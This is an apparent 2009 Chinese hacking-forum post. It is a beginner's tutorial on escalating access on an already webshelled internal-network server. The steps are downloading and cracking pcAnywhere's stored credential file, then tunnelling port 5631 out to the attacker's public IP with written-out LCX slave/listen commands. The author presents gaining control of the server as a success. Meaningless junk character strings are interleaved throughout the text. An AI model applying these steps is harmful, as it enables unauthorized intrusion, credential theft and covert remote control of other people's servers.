|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
5 ?# F- B& ^2 O9 b& {- {) R, h8 p2 V: Y* _2 n8 `: N9 `+ S) V
提权方法:pcanywhere+LCX& w$ V1 \1 e7 U2 H
5 d: t( h+ O( v1 l! {' U0 @
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
! w0 w4 T/ A" |: a* b% v) E6 g `& g
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
# ?! n( ]' X( I, x" z
1 G0 B9 t; c' M: T3 u8 m
- U- s$ A# i- v: t$ M5 _查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。7 b7 b. E4 [/ H$ A' a4 W- f
8 K% x1 m& t+ A3 [* U
; z# o. E+ G$ Y% X8 ~* Z4 l# E呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
5 D4 K3 s/ U+ f2 |; c
5 T# C- P1 }- I2 T# u
% x3 O, J; \& Z3 V- p( e' j0 }) B( @+ q4 [
( A0 q# m3 u! r: g; c4 c0 n
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
0 i0 M2 I( j' Q
V2 Y! z6 T. h m: h" [, Z1 c5 q6 e" Z" Y' n( f
LCX的用法再简单说下:2 g4 j, f0 { U# O) O8 \1 T
. J+ t) ?9 v# S/ r
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
* ^: B: ]% l8 G; z& B' ~
% [7 k& q$ W# ]5 P8 z9 U% F$ V0 h本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
! F8 n/ ^0 R# C8 L5 Q
5 c4 {+ h; Q8 d* m5 y) q _由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
3 v% @: G2 q a; @' B顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``1 I2 y* n5 H0 b4 l. J
7 X1 w4 _6 a% r! [# j$ F
) L" f7 P. t5 h7 \/ s
& Z9 c& f8 k8 b- t4 n) H7 e1 ~" J9 i8 N; X; u* p0 y- W! J
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。8 ?' a6 |2 Y3 O7 A0 h7 t
' @2 R2 H1 J6 Q1 s4 l
& [ }) y$ Y# q: a$ b1 ]) X- G1 Y3 |2 I$ C* ?6 Z: }1 h! C
8 X# z5 A' K" j# v" @+ H
我们本地连接试试,输入我们刚破解的账号密码
, ?9 I% t1 ?* d5 o; ]( b8 b1 {$ Z. a9 u I
9 }8 x" K- x# \: l$ ?, I5 w
呵呵``连接成功,服务器不错,又一个8核^︵^
+ J3 Q9 b9 R" F- A& ?
" W# t. K9 c: `# Y9 O. D: U( R
8 ^ W1 P) {& ?. y6 o$ O: f1 C$ q% G5 k5 p
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
